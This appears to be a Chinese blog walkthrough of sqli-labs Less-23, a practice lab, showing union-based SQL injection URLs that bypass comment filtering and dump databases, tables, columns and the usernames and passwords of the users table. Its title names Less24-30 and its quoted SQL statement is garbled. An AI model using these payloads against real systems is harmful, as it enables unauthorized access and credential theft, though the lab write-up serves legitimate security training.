sql-lib注入之Advanced injection(Less24-30)

本关:
Sql 语句为 s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = ′ sql="SELECT * FROM users WHERE id=' sql="SELECTFROMusersWHEREid=id’ LIMIT 0,1";此处主要是在获取 id 参数时进行了#,–注释符号的过滤。
注入:
0x01:
http://192.168.83.129/sqli-labs-master/Less-23/?id=1’ order by 3 --+
页面回显,可以看出–+并没有注释掉limit之后的语句。应该是被过滤掉了,根据上文的sql语句。我们构造正确的语句。
在这里插入图片描述0x02
判断字段数:
http://192.168.83.129/sqli-labs-master/Less-23/?id=1’ order by 4,'3
在这里插入图片描述

http://192.168.83.129/sqli-labs-master/Less-23/?id=1' order by 3,'3
在这里插入图片描述http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,2,database(),3' 可以看出数据有好多
在这里插入图片描述爆出数据库:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),%273
在这里插入图片描述爆出表:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),%273
在这里插入图片描述爆出列:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),%273
在这里插入图片描述爆出字段:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(username,password) from security.users),%273
在这里插入图片描述http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(username) from security.users),%273
在这里插入图片描述http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(password) from security.users),%273
在这里插入图片描述至此注入结束。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值